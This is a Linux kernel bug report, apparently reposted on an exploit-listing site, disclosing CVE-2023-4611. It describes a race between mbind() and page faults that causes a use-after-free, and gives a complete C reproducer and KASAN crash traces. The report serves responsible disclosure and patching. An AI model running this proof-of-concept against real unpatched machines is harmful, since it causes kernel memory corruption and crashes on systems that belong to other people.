Share
## https://sploitus.com/exploit?id=PACKETSTORM:189868
(tested on git master, at commit 57012c57536f)
    
    Summary:
    There's a race between mbind() and VMA-locked page faults, leading to a use-after-free (UAF).
    You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.
    I'll send a suggested patch in a minute.
    
    mbind() replaces vma->vm_policy while only protected by mmap_write_lock(), which can involve freeing the old vma->vm_policy:
    
    sys_mbind  
      kernel_mbind  
        do_mbind  
          mmap_write_lock  
          mbind_range [for each vma in range]  
            vma_replace_policy  
              new = mpol_dup(...)  
              old = vma->vm_policy  
              vma->vm_policy = new  
              mpol_put(old)  
          mmap_write_unlock
    
    VMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:
    
    do_user_addr_fault  
      lock_vma_under_rcu  
      handle_mm_fault  
        __handle_mm_fault  
          handle_pte_fault  
             do_pte_missing  
               do_anonymous_page  
                 vma_alloc_zeroed_movable_folio  
                   vma_alloc_folio  
                     get_vma_policy  
                       __get_vma_policy  
                         pol = vma->vm_policy    ***race***  
                         mpol_get(pol) [conditional on MPOL_F_SHARED]  
                     [do page allocation]  
                     mpol_cond_put(pol)  
      vma_end_read
    
    Because of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.
    
    You can hit this race very quickly (in less than a second, I think) on a kernel built with CONFIG_NUMA and CONFIG_KASAN using the reproducer below. You don't need an actual NUMA system for this; I've tested it in a QEMU VM without NUMA:
    
    // gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall  
    #define _GNU_SOURCE  
    #include <pthread.h>  
    #include <err.h>  
    #include <unistd.h>  
    #include <sys/syscall.h>  
    #include <sys/mman.h>  
    #include <linux/mempolicy.h>  
      
    /*
     * SYSCHK(x): evaluate the expression x once and yield its value.
     * If the value equals -1 converted to x's type (this also covers a
     * pointer result such as the one returned by a failed mmap()), print
     * "SYSCHK(<expression text>)" together with the errno description via
     * err() and terminate the process with exit status 1.
     *
     * Relies on GNU statement expressions. __typeof__ is used instead of
     * typeof so the macro also builds in strict ISO modes (e.g. -std=c11).
     * The stringified expression is passed through "%s" so that a '%' in
     * the checked expression is never interpreted as a format conversion.
     * Each continuation backslash must be the last character on its line.
     */
    #define SYSCHK(x) ({                        \
      __typeof__(x) syschk_res_ = (x);          \
      if (syschk_res_ == (__typeof__(x))-1L)    \
        err(1, "%s", "SYSCHK(" #x ")");         \
      syschk_res_;                              \
    })
      
    // Base address of the one-page anonymous mapping created in main();
    // used by both the faulting thread and the mbind() loop.
    static char *vma;
      
    /*
     * Thread body for the faulting side of the race: forever write to the
     * first byte of the mapping (faulting the page in) and then drop the
     * page again with MADV_DONTNEED. Never returns; `arg` is unused.
     */
    static void *fault_thread(void *arg) {
      (void)arg;
      for (;;) {
        // Touch the page so it gets faulted in...
        vma[0] = 1;
        // ...then have the PTE zeroed again (zap_page_range_single()).
        SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));
      }
    }
      
    // Apply the memory policy mode `policy` to the one-page range starting at
    // `vma` using a raw mbind syscall. Any -1 return is fatal via SYSCHK().
    static void mbind_vma(unsigned long policy) {
      // Node mask with only bit 0 set.
      unsigned long nmask = (1UL << 0);
      // Arguments after the syscall number, in order: start address, length
      // (0x1000), mode (`policy` with no extra bits OR'd in), pointer to the
      // node mask, maxnode (bit width of nmask plus one), and flags (0).
      // NOTE(review): the "+1" on maxnode presumably accounts for how the
      // kernel counts mask bits -- confirm against mbind(2).
      SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));
    }
      
    /*
     * Reproducer entry point: map one anonymous private page at the fixed
     * address 0x100000, start the thread that keeps faulting that page in,
     * and then alternate the page's policy between MPOL_BIND and
     * MPOL_INTERLEAVE forever. Only exits through a fatal error.
     */
    int main(void) {
      pthread_t faulter;

      vma = SYSCHK(mmap((void*)0x100000, 0x1000,
            PROT_READ|PROT_WRITE|PROT_EXEC,
            MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));

      // pthread_create() reports failure through its return value, not
      // errno, hence errx() rather than err().
      if (pthread_create(&faulter, NULL, fault_thread, NULL) != 0)
        errx(1, "pthread_create");

      // Each call swaps in a new policy for the mapping, racing with the
      // page faults taken by the other thread.
      for (;;) {
        mbind_vma(MPOL_BIND);
        mbind_vma(MPOL_INTERLEAVE);
      }
    }
    
    This will give the following splat:
    
    BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220  
    Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556  
      
    CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304  
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014  
    Call Trace:  
     <TASK>  
     dump_stack_lvl+0x36/0x50  
     print_report+0xcf/0x660  
    [...]  
     kasan_report+0xc7/0x100  
    [...]  
     vma_alloc_folio+0x93/0x220  
     __handle_mm_fault+0x71b/0x1060  
    [...]  
     handle_mm_fault+0xbe/0x280  
     do_user_addr_fault+0x196/0x630  
     exc_page_fault+0x5c/0xc0  
     asm_exc_page_fault+0x26/0x30  
    [...]  
     </TASK>  
      
    Allocated by task 555:  
     kasan_save_stack+0x33/0x60  
     kasan_set_track+0x25/0x30  
     __kasan_slab_alloc+0x6e/0x70  
     kmem_cache_alloc+0xf5/0x260  
     __mpol_dup+0x72/0x1c0  
     vma_replace_policy+0x20/0xb0  
     do_mbind+0x379/0x510  
     kernel_mbind+0x11a/0x130  
     do_syscall_64+0x3b/0x90  
     entry_SYSCALL_64_after_hwframe+0x6e/0xd8  
      
    Freed by task 555:  
     kasan_save_stack+0x33/0x60  
     kasan_set_track+0x25/0x30  
     kasan_save_free_info+0x2b/0x50  
     __kasan_slab_free+0x10a/0x180  
     kmem_cache_free+0xaa/0x380  
     vma_replace_policy+0x87/0xb0  
     do_mbind+0x379/0x510  
     kernel_mbind+0x11a/0x130  
     do_syscall_64+0x3b/0x90  
     entry_SYSCALL_64_after_hwframe+0x6e/0xd8  
    [...]  
    
    If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.
    
    In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.
    
    This bug is subject to a 90-day disclosure deadline. If a fix for this
    issue is made available to users before the end of the 90-day deadline,
    this bug report will become public 30 days after the fix was made
    available. Otherwise, this bug report will become public at the deadline.
    The scheduled deadline is 2023-10-26.
    
    
    Related CVE Number: CVE-2023-4611.
    
    Credit: Jann Horn